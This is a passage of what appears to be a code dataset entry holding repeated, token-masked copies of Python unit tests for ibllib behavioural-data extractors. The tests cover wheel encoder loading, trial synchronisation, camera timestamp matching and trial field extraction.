t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n 
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = 
camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n 
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = 
training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n 
self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n 
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, 
np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.main_path = Path(__file__).parent\n\n    def test_encoder_events_corrupt(self):\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, 
min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = 